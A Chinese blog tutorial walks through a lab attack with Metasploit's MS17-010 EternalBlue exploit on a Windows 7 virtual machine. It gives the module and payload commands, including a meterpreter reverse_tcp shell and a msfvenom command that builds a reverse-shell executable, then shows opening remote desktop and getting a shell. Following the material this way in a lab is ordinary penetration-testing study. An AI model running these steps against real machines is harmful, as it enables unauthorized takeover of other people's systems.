• 利用Metasploit控制目标电脑(Win7_x64系统)


    介绍

          MSF,是The Metasploit Framework的简称。MSF是一个非常好用的渗透框架,里面集成了许多框架和工具;MSF高度模块化,即框架由多个module组成。进一步解释,是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode,并持续保持更新;metasploit涵盖了渗透测试中全过程,可以在这个框架下利用现有的Payload进行一系列的渗透测试。

    MS17-010(永恒之蓝)漏洞简介

          永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。(从EternalBlue这个Exploit被影子经纪人公布到互联网上后,就成为了“明星”。在漏洞被发现的五月中,这个Exploit被多款恶意软件利用。包括肆虐的WannaCryp0t,无文件的勒索软件UIWIX和SMB蠕虫EternalRocks。EternalBlue(在微软的MS17-010中被修复)是在Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码)。

        永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码。

    目录

    1. 前提

    2. 开启模块

    3. 查找漏洞

    4. 设置模块

    5. 设置参数并开始攻击

    6. 攻击成功及反馈

    7. 获取靶机权限

    8. 附加

    1. 前提

       ①kali攻击机与Win7系统在同一局域网的同一网段上;

       ②能相互ping通。

        Kali信息:

        网卡使用VMnet8,通过物理机可知:

        Win7信息:

      测试下网络是否能ping通:

     2. 开启模块

         打开kali,利用msf框架进行渗透,先查看kali数据库是否开启:

    service postgresql status

        下图为没有开启,还可以设置postgresql,开机自启:

    update-rc.d postgresql enable

     3. 查找漏洞

        首先使用namp对靶机(Win7系统)进行扫描,确定445端口是否开启; 

    4. 设置模块 

       打开metasploit搜索ms17-010;

      ①进入msfconsole (每次界面随机,不固定)

      ②初始化数据库  msfdb init

      下面直接查找漏洞ms17_010(永恒之蓝就是利用这个漏洞)。

      关注两个:扫描漏洞    auxiliary/scanner/smb/smb_ms17_010;

                        漏洞利用   exploit/windows/smb/ms17_010_eternalblue;

     5. 设置参数并开始攻击

        选择漏洞验证扫描工具并设置参数;

        ①use auxiliary/scanner/smb/smb-ms17-010 利用扫描漏洞,开启模块

        ②show options:查看设置

       ③set rhost 靶机ip(192.168.137.140)

       ④exploit 运行

       选择攻击模块并设置参数;

      ①use exploit/windows/smb/ms17_010_eternalblue //选择模块

      ②options //查看详细信息

       ③set payload windows/x64/meterpreter/reverse_tcp //选择荷载

       ④set rhost 靶机ip(Win7:192.168.137.140)

       ⑤set lhost 攻击机ip(kali:192.168.137.134)

     6. 攻击成功及反馈

        exploit //运行攻击

    7. 获取靶机权限

       ①run getgui -e // 开启靶机3389端口(远程桌面用)

       ②查看系统信息、提权添加账户以及获取密码等

       输入shell进入目标系统 shell

       chcp 65001 //解决shell后windows终端乱码

       sysconfig  //查看靶机系统信息

    附加:

        当然还有一种方法对Windows系统进行渗透,即Windows操作系统下Meterpreter的使用。

        ① 生成一个被控端payload1.exe,再启动Metasploit

    msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.137.139 lport=5000 -f exe -o /root/payload1.exe 

      ②成功启动Metasploit之后,执行以下命令,将生成的payload1复制到虚拟机Windows 7中,此时在主控端就可以打开一个Meterpreter控制会话(session)

      ③background命令可将当前会话切换到后台,就可以返回到上一级的模块控制处了;

      sessions命令可显示所有的会话,以查看目标机的信息。

     下面送上两张常用命令的图片

    至此,两种方式对靶机已成功渗透。

  • 相关阅读:
    web常见的攻击方式有哪些?如何防御?
    初探富文本之基于虚拟滚动的大型文档性能优化方案
    CSND BUG
    Linux安装Zookeeper
    元宇宙的六大支撑技术
    19-ESP32-S3外设IIC
    Java中的Map接口(Hashtable+LinkedHashMap)[77]
    cobol-简介
    高通cDSP简单编程例子(实现查询高通cDSP使用率、签名),RK3588 npu使用率查询
    6个步骤轻松实现 postman 接口压力测试(建议收藏)
  • 原文地址:https://blog.csdn.net/a1010256340/article/details/126034333